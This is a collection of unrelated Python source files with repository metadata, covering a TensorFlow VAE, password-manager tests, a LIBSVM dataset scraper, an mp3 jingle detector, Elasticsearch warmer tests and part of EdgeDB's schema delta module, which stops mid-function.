{Prefix.B, Prefix.L},
{Prefix.U}
]
if prefixes in allowed_iob2_prefixes:
return IOB2
elif prefixes in allowed_ioe2_prefixes:
return IOE2
elif prefixes in allowed_iobes_prefixes:
return IOBES
elif prefixes in allowed_bilou_prefixes:
return BILOU
else:
raise ValueError(error_message.format(prefixes))
``` |
{
"source": "jrabary/generator-tf",
"score": 2
} |
#### File: _project/_data/inputs_test.py
```python
import tensorflow as tf
class InputsTest(tf.test.TestCase):
def test_inputs(self):
# Write your inputs unit test here
pass
``` |
{
"source": "jrabary/xae",
"score": 2
} |
#### File: jrabary/xae/vae_main.py
```python
import tensorflow as tf
import numpy as np
import PIL.Image as Image
from xae.data import celeba_dataset
from xae.models import celebs
from xae.models.dcgan_generator import DCGANGenerator
tfgan = tf.contrib.gan
ds = tf.contrib.distributions
slim = tf.contrib.slim
default_params = tf.contrib.training.HParams(
latent_space_dim=2,
observable_space_dims=[28, 28, 1],
learning_rate=1e-4,
)
celebs_params = tf.contrib.training.HParams(
generator={
'final_size': 32,
'depth': 64,
'num_outputs': 3
},
latent_space_dim=64,
observable_space_dims=[32, 32, 3],
learning_rate=1e-4,
batch_size=64,
train_data='/Users/jaonary/Data/celebA/img_align_celeba/*.jpg',
)
# def input_fn():
# dataset = (mnist_dataset.train('data/mnist')
# .repeat()
# .cache()
# .shuffle(buffer_size=50000)
# .batch(128)
# )
# (images, _) = dataset.make_one_shot_iterator().get_next()
#
# images = tf.reshape(images, [128, 28, 28, 1])
#
# return images, images
def model_fn(features, labels, mode, params):
is_training = mode == tf.estimator.ModeKeys.TRAIN
x = features
q_z_given_x = celebs.encode(x, params.latent_space_dim)
z_samples = q_z_given_x.sample()
generator = DCGANGenerator(z_samples, params.generator, is_training)
x_mean = tf.reshape(generator.mean, [params.batch_size] + params.observable_space_dims)
x_mean.set_shape([params.batch_size]+params.observable_space_dims)
reconstruction = tfgan.eval.image_reshaper(x_mean, num_cols=8)
tf.summary.image('reconstruction/x_mean', reconstruction)
# compute loss
# prior := p_z
prior = ds.MultivariateNormalDiag(loc=tf.zeros([1, params.latent_space_dim], dtype=tf.float32),
scale_diag=tf.ones([1, params.latent_space_dim], dtype=tf.float32))
# KL can be seen as regularization term!
KL = ds.kl_divergence(q_z_given_x, prior)
# The ELBO = reconstruction term + regularization term
reconstruction_loss = generator.reconstruction_loss(labels)
# tf.summary.scalar('reconstruction/loss', reconstruction_loss)
# elbo = tf.reduce_sum(tf.reduce_sum(log_prob,) - KL)
elbo = tf.reduce_sum(reconstruction_loss - KL)
loss = -elbo
optimizer = tf.train.AdamOptimizer(learning_rate=params.learning_rate)
train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op
)
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
config = tf.estimator.RunConfig(save_summary_steps=10)
estimator = tf.estimator.Estimator(model_fn=model_fn,
model_dir='celeba_training_2',
params=celebs_params,
config=config)
estimator.train(input_fn=lambda: celeba_dataset.image_file_inputs(celebs_params.train_data,
batch_size=celebs_params.batch_size,
patch_size=celebs_params.observable_space_dims[0]))
```
#### File: xae/data/celeba_dataset.py
```python
import tensorflow as tf
def close_crop(image, patch_size):
image.set_shape([None, None, 3])
width = 178
height = 218
new_width = 140
new_height = 140
left = (width - new_width) // 2
top = (height - new_height) // 2
right = (width + new_width) // 2
bottom = (height + new_height) // 2
image = tf.expand_dims(image, axis=0)
crops = tf.image.crop_to_bounding_box(image, top, left, bottom - top, right - left)
resize = tf.image.resize_images(crops, [patch_size, patch_size])
output = tf.squeeze(resize, axis=0)
output.set_shape([patch_size, patch_size, 3])
output = tf.to_float(output) / 255.
return output
def image_file_inputs(file_patters, batch_size=32, patch_size=32):
dataset = (tf.data.Dataset.list_files(file_patters)
.map(tf.read_file)
.map(tf.image.decode_image)
.map(lambda x: close_crop(x, patch_size))
.batch(batch_size))
data_iterator = dataset.make_one_shot_iterator()
images = data_iterator.get_next()
return images, images
```
#### File: xae/models/celebs.py
```python
import tensorflow as tf
from math import log
from nets import dcgan
slim = tf.contrib.slim
ds = tf.contrib.distributions
def encode(x, latent_space_dim, is_training=True, scope='Encoder', fused_batch_norm=False):
normalizer_fn = slim.batch_norm
normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': fused_batch_norm,
}
depth = 128
inp_shape = x.get_shape().as_list()[1]
with tf.variable_scope(scope, values=[x]):
with slim.arg_scope([normalizer_fn], **normalizer_fn_args):
with slim.arg_scope([slim.conv2d],
stride=2,
kernel_size=4,
activation_fn=tf.nn.leaky_relu):
net = x
# for i in range(int(log(inp_shape, 2))):
for i in range(4):
scope = 'conv%i' % (i + 1)
current_depth = depth * 2 ** i
normalizer_fn_ = None if i == 0 else normalizer_fn
net = slim.conv2d(
net, current_depth, normalizer_fn=normalizer_fn_, scope=scope)
net = slim.flatten(net)
means = slim.fully_connected(net,
latent_space_dim,
normalizer_fn=None,
activation_fn=None)
log_sigmas = slim.fully_connected(net,
latent_space_dim,
normalizer_fn=None,
activation_fn=tf.nn.softplus)
q_z_given_x = ds.MultivariateNormalDiag(means, log_sigmas)
return q_z_given_x
def decode(inputs, final_size, depth=64, is_training=True, num_outputs=3, fused_batch_norm=False, scope='Generator'):
"""Use dcgan generator architecture as decoder"""
normalizer_fn = slim.batch_norm
normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': fused_batch_norm,
}
inputs.get_shape().assert_has_rank(2)
if log(final_size, 2) != int(log(final_size, 2)):
raise ValueError('`final_size` (%i) must be a power of 2.' % final_size)
if final_size < 8:
raise ValueError('`final_size` (%i) must be greater than 8.' % final_size)
end_points = {}
num_layers = int(log(final_size, 2)) - 1
with tf.variable_scope(scope, values=[inputs]):
with slim.arg_scope([normalizer_fn], **normalizer_fn_args):
with slim.arg_scope([slim.conv2d_transpose],
normalizer_fn=normalizer_fn,
stride=2,
kernel_size=4):
net = tf.expand_dims(tf.expand_dims(inputs, 1), 1)
# First upscaling is different because it takes the input vector.
current_depth = depth * 2 ** (num_layers - 1)
scope = 'deconv1'
net = slim.conv2d_transpose(
net, current_depth, stride=1, padding='VALID', scope=scope)
end_points[scope] = net
for i in range(2, num_layers):
scope = 'deconv%i' % (i)
current_depth = depth * 2 ** (num_layers - i)
net = slim.conv2d_transpose(net, current_depth, scope=scope)
end_points[scope] = net
# Last layer has different normalizer and activation.
scope = 'deconv%i' % (num_layers)
net = slim.conv2d_transpose(
net, depth, normalizer_fn=None, activation_fn=None, scope=scope)
end_points[scope] = net
# Convert to proper channels.
scope = 'means'
means = slim.conv2d(
net,
num_outputs,
normalizer_fn=None,
activation_fn=None,
kernel_size=1,
stride=1,
padding='VALID',
scope=scope)
end_points[scope] = means
means.get_shape().assert_has_rank(4)
means.get_shape().assert_is_compatible_with(
[None, final_size, final_size, num_outputs])
scope = 'log_sigmas'
log_sigmas = slim.conv2d(
net,
num_outputs,
normalizer_fn=None,
activation_fn=tf.nn.softplus,
kernel_size=1,
stride=1,
padding='VALID',
scope=scope)
end_points[scope] = log_sigmas
log_sigmas.get_shape().assert_has_rank(4)
log_sigmas.get_shape().assert_is_compatible_with(
[None, final_size, final_size, num_outputs])
p_x_given_z = ds.MultivariateNormalDiag(tf.reshape(means, [-1, final_size*final_size*num_outputs]),
tf.reshape(log_sigmas, [-1, final_size*final_size*num_outputs]))
return p_x_given_z
```
#### File: xae/models/encoder.py
```python
from abc import ABCMeta
from abc import abstractmethod
import tensorflow as tf
slim = tf.contrib.slim
class Encoder(object):
"""Abstract base class for probabilistic encoder model.
"""
__metaclass__ = ABCMeta
def __init__(self, obs_tensors, params, is_training):
self._scope = 'Encoder'
self._normalizer_fn = slim.batch_norm
self._normalizer_fn_args = {
'is_training': is_training,
'zero_debias_moving_mean': True,
'fused': True,
}
self._q_z_given_x = self._compute_prob_z_given_x(obs_tensors, params)
@property
def q_z_given_x(self):
return self._q_z_given_x
@abstractmethod
def _compute_prob_z_given_x(self, obs_tensors, params):
pass
```
#### File: xae/models/mnist.py
```python
import tensorflow as tf
import numpy as np
ds = tf.contrib.distributions
def decode(z, observable_space_dims):
with tf.variable_scope('Decoder', [z]):
logits = tf.layers.dense(z, 200, activation=tf.nn.tanh)
logits = tf.layers.dense(logits, np.prod(observable_space_dims))
p_x_given_z = ds.Bernoulli(logits=logits)
return p_x_given_z
def encoder(x, observable_space_dim, latent_dim):
with tf.variable_scope('Encoder', [x]):
x = tf.reshape(x, [-1, np.prod(observable_space_dim)])
h = tf.layers.dense(x, 10, activation=tf.nn.tanh)
mu = tf.layers.dense(h, latent_dim)
sigma_sq = tf.layers.dense(h, latent_dim)
q_z_given_x = ds.MultivariateNormalDiag(mu, sigma_sq)
return q_z_given_x
``` |
{
"source": "jrabasco/PyPasser",
"score": 3
} |
#### File: PyPasser/test/test_database.py
```python
__author__ = '<NAME>'
import sys
sys.path.append("..")
import unittest
from modules import database
from modules import service
class TestDatabase(unittest.TestCase):
def test_database_creation(self):
self.assertEqual(database.Database().name, "Database")
def test_custom_name(self):
db = database.Database()
db.name = "Custom"
self.assertEqual(db.name, "Custom")
def test_add_service(self):
test_service = service.Service()
db = database.Database()
db.add_service(test_service)
self.assertEqual(test_service.service_name, db.services[0].service_name)
self.assertEqual(test_service.username, db.services[0].username)
self.assertEqual(test_service.password, db.services[0].password)
def test_load(self):
db = database.Database()
dic = {
"name": "Hey",
"services": [service.Service()]
}
db.load(dic)
self.assertEqual("Hey", db.name)
self.assertEqual("ServiceName", db.services[0].service_name)
self.assertEqual("Username", db.services[0].username)
self.assertEqual("Password", db.services[0].password)
if __name__ == "__main__":
unittest.main()
```
#### File: PyPasser/test/test_storage.py
```python
__author__ = "<NAME>"
import sys
import os
sys.path.append("..")
import unittest
from modules import storage
from modules.service import Service
from modules.database import Database
class TestStorage(unittest.TestCase):
def setUp(self):
self.service = Service()
self.database = Database()
open("test.service", "w+").close()
open("test.db", "w+").close()
def test_write_read_service(self):
self.service.service_name = "Hello"
self.service.username = "This"
self.service.password = "<PASSWORD>"
storage.write("test", self.service, "test.service")
service2 = Service()
storage.read("test", service2, "test.service")
self.assertEqual(service2.service_name, self.service.service_name)
self.assertEqual(service2.username, self.service.username)
self.assertEqual(service2.password, self.service.password)
def test_write_read_database(self):
self.database.add_service(Service())
self.database.add_service(Service())
self.database.name = "Hey"
storage.write("test", self.database, "test.db")
database2 = Database()
storage.read("test", database2, "test.db")
self.assertEqual(database2.name, self.database.name)
for i in range(len(self.database.services)):
self.assertEqual(database2.services[i].service_name, self.database.services[i].service_name)
self.assertEqual(database2.services[i].username, self.database.services[i].username)
self.assertEqual(database2.services[i].password, self.database.services[i].password)
def tearDown(self):
os.remove(os.getcwd() + "/test.service")
os.remove(os.getcwd() + "/test.db")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jrabinow/JJBoost",
"score": 3
} |
#### File: JJBoost/webscraper/dataset_downloader.py
```python
import urllib2
from BeautifulSoup import BeautifulSoup
import re
# max file size 23MB
maxFileSize = 1024*1024*23
def http_download(url):
try:
request = urllib2.urlopen(url)
data = request.read(maxFileSize)
# if file too large
if request.read(1) != '':
return None
else:
return data
except urllib2.HTTPError, e:
print("urllib2.HttpError")
exit()
except urllib2.URLError, e:
print("urllib2.URLError")
exit()
def extract_urls(baseurl):
response = http_download(baseurl)
soup = BeautifulSoup(response)
links = soup.findAll('a')[5:]
return links
def download_all(baseurl):
links = extract_urls(baseurl)
filenames = list()
for link in links:
url = baseurl + "/" + link.get("href")
print("Downloading " + url)
data = http_download(url)
if data == None:
print("Skipping (file too large)")
continue
data_file_name = url[url.rfind('/')+1:]
with open("./Datasets/" + data_file_name, "wb") as data_file:
data_file.write(data)
filenames.append(data_file_name)
return filenames
def main():
baseurl = "http://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/"
download_all(baseurl)
if __name__ == "__main__":
main()
``` |
{
"source": "jraby/detect-audio-jingle",
"score": 2
} |
#### File: jraby/detect-audio-jingle/detect-audio-jingle.py
```python
import argparse
import glob
import librosa
import ffmpeg
import numpy as np
import os.path
import scipy.signal
import shutil
import warnings
from natsort import natsorted
max_longclip_duration = 4 * 60
def loadAudio(filename, sr=None):
y, sr = librosa.load(filename, duration=max_longclip_duration, mono=True, sr=sr)
return y, sr
def save_trimmed(in_file, out_file, seek):
if not seek:
shutil.copyfile(in_file, out_file)
return
ffmpeg.input(in_file, ss=seek).output(out_file, acodec="copy").overwrite_output().run()
def main():
warnings.filterwarnings('ignore', category=UserWarning, append=True)
parser = argparse.ArgumentParser()
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument("-d", "--input-dir", help="process all mp3s from this directory", action="store")
input_group.add_argument("-i", "--input-file", help="mp3 file to process", action="store")
parser.add_argument("-c", "--clip", help="mp3 clip to try and locate in input file(s)",
required=True)
parser.add_argument("--output-dir", help="Directory in which to save trimmed mp3s")
parser.add_argument("-n", "--dry-run", help="Dry-run", action="store_true")
parser.add_argument("--plots-dir", help="Directory in which to save a plot for each detection")
parser.add_argument("--fp-threshold-factor", default=16, type=int,
help="false positive threshold factor: max peak must be > [factor] * stddev + mean to trigger detection")
parser.add_argument("--percentile", help="First sample >= the percentile is considered 'peak'",
default=99.99, type=float) # determined by precise eye balling
args = parser.parse_args()
if not args.output_dir and not args.dry_run:
raise Exception("Needs --output-dir or --dry-run")
clip, clip_sr = loadAudio(args.clip)
# Cache of sample_rate -> reversed clip to be used by fftconvolve
clip_sr_cache = {clip_sr: clip[::-1]}
if args.input_file:
input_files = [args.input_file]
else:
input_files = natsorted(glob.glob(f"{args.input_dir}/*.mp3"))
for f in input_files:
base_f = os.path.basename(f)
if args.output_dir and not args.dry_run:
out_file = args.output_dir + '/' + base_f
if os.path.exists(out_file):
print(f"{f[:64]:64}: SKIPPED - output file already exists")
continue
f_samples, f_sr = loadAudio(f)
if f_sr not in clip_sr_cache:
# Resample clip to match current file and cache it (reversed) for future use
clip_sr_cache[f_sr] = librosa.core.resample(clip, clip_sr, f_sr)[::-1]
to_find = clip_sr_cache[f_sr]
# Find clip in input file using fftconvolve. Then approximate the start position of the clip.
# The 'peak' of the result is supposed to be the middle of the match, but it seems to be a
# little late according to precise by ear measurement.
# So instead of using the max value, this is using the first value that is in some high
# percentile (99.99).
z = scipy.signal.fftconvolve(f_samples, to_find, mode="same")
z = np.abs(z)
event_detection_threshold = np.percentile(z, args.percentile)
z_event_pos = np.argmax(z >= event_detection_threshold)
z_event_start = z_event_pos - len(to_find) // 2 # (peak assumed to be in middle of clip)
# But using percentiles leads to early detection, needs to floor to 0
z_event_start = z_event_start if z_event_start > 0 else 0
seek = z_event_start / f_sr
zmax = np.max(z)
zstd = np.std(z)
zmean = np.mean(z)
fp_max_threshold = zstd * args.fp_threshold_factor + zmean
keep = zmax > fp_max_threshold and seek > 10
if not keep:
seek = 0
print((f"{f[:64]:64}: {'KEEP' if keep else 'NOPE'} {f_sr}hz "
f"{event_detection_threshold=:0.2f} {fp_max_threshold=:0.2f} "
f"{zmax=:0.2f} {zstd=:0.2f} {zmean=:0.2f} {z_event_start=} "
f"seek:{seek:0.2f}s"))
if args.plots_dir:
import matplotlib.pyplot as plt
os.makedirs(args.plots_dir, exist_ok=True)
x_min = 0
x_max = z_event_start + 5*f_sr
if x_max > len(z):
x_max = len(z)
plt.plot(z[x_min:x_max])
plt.xlabel("Sample number")
plt.title(base_f)
plt.savefig(f"{args.plots_dir}/{os.path.basename(f)}.png")
plt.clf()
if args.output_dir and not args.dry_run:
os.makedirs(args.output_dir, exist_ok=True)
out_file = args.output_dir + '/' + base_f
save_trimmed(in_file=f, out_file=out_file, seek=seek)
if __name__ == '__main__':
main()
``` |
{
"source": "jraby/pyes",
"score": 2
} |
#### File: pyes/tests/test_warmers.py
```python
from __future__ import absolute_import
from pyes.tests import ESTestCase
import pyes
class WarmerTestCase(ESTestCase):
def setUp(self):
super(WarmerTestCase, self).setUp()
self.conn.indices.create_index(self.index_name)
self.conn.indices.refresh(self.index_name)
def test_put_get_warmer(self):
warmer1 = pyes.Search(pyes.MatchAllQuery())
#ES fails if the index is empty
self.conn.index({'a':1}, self.index_name, self.document_type)
self.conn.indices.refresh(self.index_name)
self.conn.put_warmer(indices=[self.index_name], name='w1', warmer=warmer1)
result = self.conn.get_warmer(indices=[self.index_name], name='w1')
expected = {
self.index_name: {
'warmers': {
'w1': {
'source': {
'query': {'match_all': {}}
},
'types': []
}
}
}
}
self.assertEqual(result, expected)
def test_delete_warmer(self):
warmer1 = pyes.Search(pyes.MatchAllQuery())
self.conn.put_warmer(indices=[self.index_name], name='w1', warmer=warmer1)
self.conn.delete_warmer(indices=[self.index_name], name='w1')
self.assertRaises(
pyes.exceptions.ElasticSearchException,
self.conn.get_warmer,
indices=[self.index_name],
name='w1'
)
if __name__ == "__main__":
import unittest
unittest.main()
``` |
{
"source": "jracabado/edgedb",
"score": 2
} |
#### File: edb/schema/delta.py
```python
from __future__ import annotations
from typing import *
import collections
import collections.abc
import contextlib
import functools
import itertools
import uuid
from edb import errors
from edb.common import adapter
from edb.common import checked
from edb.common import markup
from edb.common import ordered
from edb.common import parsing
from edb.common import struct
from edb.common import topological
from edb.common import typing_inspect
from edb.common import verutils
from edb.edgeql import ast as qlast
from edb.edgeql import compiler as qlcompiler
from edb.edgeql import qltypes
from edb.edgeql import quote as qlquote
from . import expr as s_expr
from . import name as sn
from . import objects as so
from . import schema as s_schema
from . import utils
def delta_objects(
old: Iterable[so.Object_T],
new: Iterable[so.Object_T],
sclass: Type[so.Object_T],
*,
parent_confidence: Optional[float] = None,
context: so.ComparisonContext,
old_schema: s_schema.Schema,
new_schema: s_schema.Schema,
) -> DeltaRoot:
delta = DeltaRoot()
oldkeys = {o: o.hash_criteria(old_schema) for o in old}
newkeys = {o: o.hash_criteria(new_schema) for o in new}
unchanged = set(oldkeys.values()) & set(newkeys.values())
old = ordered.OrderedSet[so.Object_T](
o for o, checksum in oldkeys.items()
if checksum not in unchanged
)
new = ordered.OrderedSet[so.Object_T](
o for o, checksum in newkeys.items()
if checksum not in unchanged
)
oldnames = {o.get_name(old_schema) for o in old}
newnames = {o.get_name(new_schema) for o in new}
common_names = oldnames & newnames
pairs = sorted(
itertools.product(new, old),
key=lambda pair: pair[0].get_name(new_schema) not in common_names,
)
full_matrix: List[Tuple[so.Object_T, so.Object_T, float]] = []
# If there are any renames that are already decided on, honor those first
renames_x: Set[sn.Name] = set()
renames_y: Set[sn.Name] = set()
for y in old:
rename = context.renames.get((type(y), y.get_name(old_schema)))
if rename:
renames_x.add(rename.new_name)
renames_y.add(rename.classname)
if context.guidance is not None:
guidance = context.guidance
def can_create(name: sn.Name) -> bool:
return (sclass, name) not in guidance.banned_creations
def can_alter(old_name: sn.Name, new_name: sn.Name) -> bool:
return (sclass, (old_name, new_name)) not in guidance.banned_alters
def can_delete(name: sn.Name) -> bool:
return (sclass, name) not in guidance.banned_deletions
else:
def can_create(name: sn.Name) -> bool:
return True
def can_alter(old_name: sn.Name, new_name: sn.Name) -> bool:
return True
def can_delete(name: sn.Name) -> bool:
return True
for x, y in pairs:
x_name = x.get_name(new_schema)
y_name = y.get_name(old_schema)
if can_alter(y_name, x_name):
similarity = y.compare(
x,
our_schema=old_schema,
their_schema=new_schema,
context=context,
)
else:
similarity = 0.0
full_matrix.append((x, y, similarity))
full_matrix.sort(
key=lambda v: (
1.0 - v[2],
str(v[0].get_name(new_schema)),
str(v[1].get_name(old_schema)),
),
)
full_matrix_x = {}
full_matrix_y = {}
seen_x = set()
seen_y = set()
x_alter_variants: Dict[so.Object_T, int] = collections.defaultdict(int)
y_alter_variants: Dict[so.Object_T, int] = collections.defaultdict(int)
comparison_map: Dict[so.Object_T, Tuple[float, so.Object_T]] = {}
comparison_map_y: Dict[so.Object_T, Tuple[float, so.Object_T]] = {}
# Find the top similarity pairs
for x, y, similarity in full_matrix:
if x not in seen_x and y not in seen_y:
comparison_map[x] = (similarity, y)
comparison_map_y[y] = (similarity, x)
seen_x.add(x)
seen_y.add(y)
if x not in full_matrix_x:
full_matrix_x[x] = (similarity, y)
if y not in full_matrix_y:
full_matrix_y[y] = (similarity, x)
if (
can_alter(y.get_name(old_schema), x.get_name(new_schema))
and full_matrix_x[x][0] != 1.0
and full_matrix_y[y][0] != 1.0
):
x_alter_variants[x] += 1
y_alter_variants[y] += 1
alters = []
if comparison_map:
if issubclass(sclass, so.InheritingObject):
# Generate the diff from the top of the inheritance
# hierarchy, since changes to parent objects may inform
# how the delta in child objects is treated.
order_x = cast(
Iterable[so.Object_T],
_sort_by_inheritance(
new_schema,
cast(Iterable[so.InheritingObject], comparison_map),
),
)
else:
order_x = comparison_map
for x in order_x:
s, y = comparison_map[x]
x_name = x.get_name(new_schema)
y_name = y.get_name(old_schema)
already_has = x_name == y_name and x_name not in renames_x
if (
0.6 < s < 1.0
or (
(not can_create(x_name) or not can_delete(y_name))
and can_alter(y_name, x_name)
)
or x_name in renames_x
):
if (
(x_alter_variants[x] > 1 or (
not already_has and can_create(x_name)))
and parent_confidence != 1.0
):
confidence = s
else:
# TODO: investigate how parent confidence should be
# correlated with child confidence in cases of explicit
# nested ALTER.
confidence = 1.0
alter = y.as_alter_delta(
other=x,
context=context,
self_schema=old_schema,
other_schema=new_schema,
confidence=confidence,
)
alter.set_annotation('confidence', confidence)
alters.append(alter)
created = new - {x for x, (s, _) in comparison_map.items() if s > 0.6}
for x in created:
x_name = x.get_name(new_schema)
if can_create(x_name) and x_name not in renames_x:
create = x.as_create_delta(schema=new_schema, context=context)
if x_alter_variants[x] > 0 and parent_confidence != 1.0:
confidence = full_matrix_x[x][0]
else:
confidence = 1.0
create.set_annotation('confidence', confidence)
delta.add(create)
delta.update(alters)
deleted_order: Iterable[so.Object_T]
deleted = old - {y for _, (s, y) in comparison_map.items() if s > 0.6}
if issubclass(sclass, so.InheritingObject):
deleted_order = _sort_by_inheritance( # type: ignore
old_schema,
cast(Iterable[so.InheritingObject], deleted),
)
else:
deleted_order = deleted
for y in deleted_order:
y_name = y.get_name(old_schema)
if can_delete(y_name) and y_name not in renames_y:
delete = y.as_delete_delta(schema=old_schema, context=context)
if y_alter_variants[y] > 0 and parent_confidence != 1.0:
confidence = full_matrix_y[y][0]
else:
confidence = 1.0
delete.set_annotation('confidence', confidence)
delta.add(delete)
return delta
def _sort_by_inheritance(
schema: s_schema.Schema,
objs: Iterable[so.InheritingObjectT],
) -> Iterable[so.InheritingObjectT]:
graph = {}
for x in objs:
graph[x] = topological.DepGraphEntry(
item=x,
deps=ordered.OrderedSet(x.get_bases(schema).objects(schema)),
extra=False,
)
return topological.sort(graph, allow_unresolved=True)
def sort_by_cross_refs(
schema: s_schema.Schema,
objs: Iterable[so.Object_T],
) -> Tuple[so.Object_T, ...]:
"""Sort an iterable of objects according to cross-references between them.
Return a toplogical ordering of a graph of objects joined by references.
It is assumed that the graph has no cycles.
"""
graph = {}
for x in objs:
graph[x] = topological.DepGraphEntry(
item=x,
deps={ref for ref in schema.get_referrers(x)
if not x.is_parent_ref(schema, ref)},
extra=False,
)
return topological.sort(graph, allow_unresolved=True) # type: ignore
CommandMeta_T = TypeVar("CommandMeta_T", bound="CommandMeta")
class CommandMeta(
adapter.Adapter,
struct.MixedStructMeta,
):
_astnode_map: Dict[Type[qlast.DDLOperation], Type[Command]] = {}
def __new__(
mcls: Type[CommandMeta_T],
name: str,
bases: Tuple[type, ...],
dct: Dict[str, Any],
*,
context_class: Optional[Type[CommandContextToken[Command]]] = None,
**kwargs: Any,
) -> CommandMeta_T:
cls = super().__new__(mcls, name, bases, dct, **kwargs)
if context_class is not None:
cast(Command, cls)._context_class = context_class
return cls
def __init__(
cls,
name: str,
bases: Tuple[type, ...],
clsdict: Dict[str, Any],
*,
adapts: Optional[type] = None,
**kwargs: Any,
) -> None:
adapter.Adapter.__init__(cls, name, bases, clsdict, adapts=adapts)
struct.MixedStructMeta.__init__(cls, name, bases, clsdict)
astnodes = clsdict.get('astnode')
if astnodes and not isinstance(astnodes, (list, tuple)):
astnodes = [astnodes]
if astnodes:
cls.register_astnodes(astnodes)
def register_astnodes(
cls,
astnodes: Iterable[Type[qlast.DDLCommand]],
) -> None:
mapping = type(cls)._astnode_map
for astnode in astnodes:
existing = mapping.get(astnode)
if existing:
msg = ('duplicate EdgeQL AST node to command mapping: ' +
'{!r} is already declared for {!r}')
raise TypeError(msg.format(astnode, existing))
mapping[astnode] = cast(Type["Command"], cls)
# We use _DummyObject for contexts where an instance of an object is
# required by type signatures, and the actual reference will be quickly
# replaced by a real object.
_dummy_object = so.Object(
_private_id=uuid.UUID('C0FFEE00-C0DE-0000-0000-000000000000'),
)
Command_T = TypeVar("Command_T", bound="Command")
Command_T_co = TypeVar("Command_T_co", bound="Command", covariant=True)
class Command(
struct.MixedStruct,
markup.MarkupCapableMixin,
metaclass=CommandMeta,
):
source_context = struct.Field(parsing.ParserContext, default=None)
canonical = struct.Field(bool, default=False)
_context_class: Optional[Type[CommandContextToken[Command]]] = None
ops: List[Command]
before_ops: List[Command]
#: AlterObjectProperty lookup table for get|set_attribute_value
_attrs: Dict[str, AlterObjectProperty]
#: AlterSpecialObjectField lookup table
_special_attrs: Dict[str, AlterSpecialObjectField[so.Object]]
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.ops = []
self.before_ops = []
self.qlast: qlast.DDLOperation
self._attrs = {}
self._special_attrs = {}
def copy(self: Command_T) -> Command_T:
result = super().copy()
result.ops = [op.copy() for op in self.ops]
result.before_ops = [op.copy() for op in self.before_ops]
return result
def get_verb(self) -> str:
"""Return a verb representing this command in infinitive form."""
raise NotImplementedError
def get_friendly_description(
self,
*,
parent_op: Optional[Command] = None,
schema: Optional[s_schema.Schema] = None,
object: Any = None,
object_desc: Optional[str] = None,
) -> str:
"""Return a friendly description of this command in imperative mood.
The result is used in error messages and other user-facing renderings
of the command.
"""
raise NotImplementedError
@classmethod
def adapt(cls: Type[Command_T], obj: Command) -> Command_T:
result = obj.copy_with_class(cls)
mcls = cast(CommandMeta, type(cls))
for op in obj.get_prerequisites():
result.add_prerequisite(mcls.adapt(op))
for op in obj.get_subcommands(include_prerequisites=False):
result.add(mcls.adapt(op))
return result
def is_data_safe(self) -> bool:
return False
def get_required_user_input(self) -> Dict[str, str]:
return {}
def record_diff_annotations(
self,
schema: s_schema.Schema,
orig_schema: Optional[s_schema.Schema],
context: so.ComparisonContext,
) -> None:
"""Record extra information on a delta obtained by diffing schemas.
This provides an apportunity for a delta command to annotate itself
in schema diff schenarios (i.e. migrations).
Args:
schema:
Final schema of a migration.
orig_schema:
Original schema of a migration.
context:
Schema comparison context.
"""
pass
def resolve_obj_collection(
self,
value: Any,
schema: s_schema.Schema,
) -> Sequence[so.Object]:
sequence: Sequence[so.Object]
if isinstance(value, so.ObjectCollection):
sequence = value.objects(schema)
else:
sequence = []
for v in value:
if isinstance(v, so.Shell):
val = v.resolve(schema)
else:
val = v
sequence.append(val)
return sequence
def _resolve_attr_value(
self,
value: Any,
fname: str,
field: so.Field[Any],
schema: s_schema.Schema,
) -> Any:
ftype = field.type
if isinstance(value, so.Shell):
value = value.resolve(schema)
else:
if issubclass(ftype, so.ObjectDict):
if isinstance(value, so.ObjectDict):
items = dict(value.items(schema))
elif isinstance(value, collections.abc.Mapping):
items = {}
for k, v in value.items():
if isinstance(v, so.Shell):
val = v.resolve(schema)
else:
val = v
items[k] = val
value = ftype.create(schema, items)
elif issubclass(ftype, so.ObjectCollection):
sequence = self.resolve_obj_collection(value, schema)
value = ftype.create(schema, sequence)
elif issubclass(ftype, s_expr.Expression):
if value is not None:
value = ftype.from_expr(value, schema)
else:
value = field.coerce_value(schema, value)
return value
def enumerate_attributes(self) -> Tuple[str, ...]:
return tuple(self._attrs)
def _enumerate_attribute_cmds(self) -> Tuple[AlterObjectProperty, ...]:
return tuple(self._attrs.values())
def has_attribute_value(self, attr_name: str) -> bool:
return attr_name in self._attrs or attr_name in self._special_attrs
def _get_simple_attribute_set_cmd(
self,
attr_name: str,
) -> Optional[AlterObjectProperty]:
return self._attrs.get(attr_name)
def _get_attribute_set_cmd(
self,
attr_name: str,
) -> Optional[AlterObjectProperty]:
cmd = self._get_simple_attribute_set_cmd(attr_name)
if cmd is None:
special_cmd = self._special_attrs.get(attr_name)
if special_cmd is not None:
cmd = special_cmd._get_attribute_set_cmd(attr_name)
return cmd
def get_attribute_value(
self,
attr_name: str,
) -> Any:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_value
else:
return None
def get_local_attribute_value(
self,
attr_name: str,
) -> Any:
"""Return the new value of field, if not inherited."""
op = self._get_attribute_set_cmd(attr_name)
if op is not None and not op.new_inherited:
return op.new_value
else:
return None
def get_orig_attribute_value(
self,
attr_name: str,
) -> Any:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.old_value
else:
return None
def is_attribute_inherited(
self,
attr_name: str,
) -> bool:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_inherited
else:
return False
def is_attribute_computed(
self,
attr_name: str,
) -> bool:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.new_computed
else:
return False
def get_attribute_source_context(
self,
attr_name: str,
) -> Optional[parsing.ParserContext]:
op = self._get_attribute_set_cmd(attr_name)
if op is not None:
return op.source_context
else:
return None
def set_attribute_value(
self,
attr_name: str,
value: Any,
*,
orig_value: Any = None,
inherited: bool = False,
orig_inherited: Optional[bool] = None,
computed: bool = False,
from_default: bool = False,
orig_computed: Optional[bool] = None,
source_context: Optional[parsing.ParserContext] = None,
) -> Command:
